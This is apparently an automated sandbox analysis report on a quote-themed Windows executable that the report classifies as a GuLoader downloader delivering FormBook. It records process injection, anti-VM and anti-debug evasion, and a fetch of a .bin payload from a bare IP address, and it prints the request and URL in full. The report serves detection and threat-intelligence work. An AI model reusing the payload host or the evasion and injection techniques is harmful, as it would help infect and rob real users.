Edit tour

Windows Analysis Report
Steel Sample- QUOTE.exe

Overview

General Information

Sample name:	Steel Sample- QUOTE.exe
Analysis ID:	1629363
MD5:	1a0611d6fad6a80c0369a33c2e09f52a
SHA1:	a66e801bc37c50f675fa9f98864caf292052900d
SHA256:	1d9fbcb6a4f1688a020b56a5d82e29498f8b2c22c6e6c04bdf1ffcbfd80b65da
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook, GuLoader

Score:	80
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected GuLoader

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Steel Sample- QUOTE.exe (PID: 7700 cmdline: "C:\Users\user\Desktop\Steel Sample- QUOTE.exe" MD5: 1A0611D6FAD6A80C0369A33C2E09F52A)

Steel Sample- QUOTE.exe (PID: 8156 cmdline: "C:\Users\user\Desktop\Steel Sample- QUOTE.exe" MD5: 1A0611D6FAD6A80C0369A33C2E09F52A)

VHmANgjD4Skpj.exe (PID: 4956 cmdline: "C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\IvjISkaf3kLl.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

VHmANgjD4Skpj.exe (PID: 5004 cmdline: "C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\l4nLx6QOlG9.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

VHmANgjD4Skpj.exe (PID: 5104 cmdline: "C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\JkvJ7lojdYjkSQ.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

VHmANgjD4Skpj.exe (PID: 5808 cmdline: "C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\qBiNHPRt6k1.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

VHmANgjD4Skpj.exe (PID: 3328 cmdline: "C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\WiDbn121k.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

VHmANgjD4Skpj.exe (PID: 5608 cmdline: "C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\z4n5bpWq.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

VHmANgjD4Skpj.exe (PID: 5776 cmdline: "C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\Kp8WknCA6aV6.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000013.00000002.3722050968.0000000003720000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3909640512.0000000004F00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.3722391436.0000000002F60000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.3723468245.0000000004DF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3722183676.0000000003380000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3940879523.0000000035F60000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3719545322.0000000002234000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000010.00000002.3722353544.0000000004410000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2210528278.00000000056B4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000015.00000002.3723188281.0000000004820000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 5 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T17:02:42.804930+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49765	196.251.86.79	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Steel Sample- QUOTE.exe	Virustotal: Detection: 23%			Perma Link
Source: Steel Sample- QUOTE.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 00000013.00000002.3722050968.0000000003720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3909640512.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3722391436.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3723468245.0000000004DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3722183676.0000000003380000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3940879523.0000000035F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722353544.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3723188281.0000000004820000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Steel Sample- QUOTE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: mshtml.pdb source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000003.2605414074.0000000035065000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603146795.0000000034EB9000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.0000000035210000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Steel Sample- QUOTE.exe, Steel Sample- QUOTE.exe, 00000006.00000003.2605414074.0000000035065000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603146795.0000000034EB9000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.0000000035210000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VHmANgjD4Skpj.exe, 0000000F.00000000.2625198364.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000010.00000002.3721450990.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000012.00000000.2848377882.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000013.00000000.2970522596.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000014.00000000.3096517936.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000015.00000000.3303309737.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp, VHmANgjD4Skpj.exe, 00000016.00000002.3720694991.0000000000EEF000.00000002.00000001.01000000.00000008.sdmp

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49765 -> 196.251.86.79:80

Source: global traffic

HTTP traffic detected: GET /vHTwkXp255.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 196.251.86.79Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79
Source: unknown	TCP traffic detected without corresponding DNS query: 196.251.86.79

Source: global traffic

HTTP traffic detected: GET /vHTwkXp255.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 196.251.86.79Cache-Control: no-cache

Source: Steel Sample- QUOTE.exe, 00000006.00000002.3913657118.000000000512B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://196.251.86.79/
Source: Steel Sample- QUOTE.exe, 00000006.00000002.3913657118.00000000050E8000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603617259.000000000512F000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3914805097.0000000005131000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603412304.000000000512F000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3917799821.0000000005340000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://196.251.86.79/vHTwkXp255.bin
Source: Steel Sample- QUOTE.exe, 00000006.00000002.3913657118.00000000050E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://196.251.86.79/vHTwkXp255.binD3
Source: Steel Sample- QUOTE.exe, 00000006.00000003.2603617259.000000000512F000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3914805097.0000000005131000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2603412304.000000000512F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://196.251.86.79/vHTwkXp255.binGMM/
Source: Steel Sample- QUOTE.exe, 00000006.00000002.3913657118.00000000050E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://196.251.86.79/vHTwkXp255.binN(r/
Source: Steel Sample- QUOTE.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.0000000000649000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.00000000005F2000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207406132.0000000000649000.00000008.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000013.00000002.3722050968.0000000003720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3909640512.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3722391436.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3723468245.0000000004DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3722183676.0000000003380000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3940879523.0000000035F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722353544.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3723188281.0000000004820000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352835C0 NtCreateMutant,LdrInitializeThunk,	6_2_352835C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35282DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_35282DF0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35282C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_35282C70
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35282B60 NtClose,LdrInitializeThunk,	6_2_35282B60
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35283010 NtOpenDirectoryObject,	6_2_35283010
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35283090 NtSetValueKey,	6_2_35283090

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,

0_2_00403358

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

File created: C:\Windows\resources\Bementite.ini

Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35307571	6_2_35307571
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352ED5B0	6_2_352ED5B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353195C3	6_2_353195C3
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530F43F	6_2_3530F43F
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35241460	6_2_35241460
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530F7B0	6_2_3530F7B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_35295630	6_2_35295630
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353016CC	6_2_353016CC
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3528516C	6_2_3528516C
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523F172	6_2_3523F172
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3531B16B	6_2_3531B16B
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3525B1B0	6_2_3525B1B0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530F0E0	6_2_3530F0E0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_353070E9	6_2_353070E9
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352FF0CC	6_2_352FF0CC
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352570C0	6_2_352570C0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3530132D	6_2_3530132D
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_3523D34C	6_2_3523D34C

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: String function: 3523B970 appears 73 times

Source: Steel Sample- QUOTE.exe, 00000006.00000003.2605414074.0000000035192000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
Source: Steel Sample- QUOTE.exe, 00000006.00000002.3940212352.000000003533D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
Source: Steel Sample- QUOTE.exe, 00000006.00000003.2603146795.0000000034FDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe

Source: Steel Sample- QUOTE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal80.troj.evad.winEXE@3/9@0/1

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

File created: C:\Users\user\AppData\Roaming\Rigsantikvarernes

Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

File created: C:\Users\user\AppData\Local\Temp\nsg4D88.tmp

Jump to behavior

Source: Steel Sample- QUOTE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Steel Sample- QUOTE.exe	Virustotal: Detection: 23%
Source: Steel Sample- QUOTE.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

File read: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Process created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Process created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: umpdc.dll	Jump to behavior
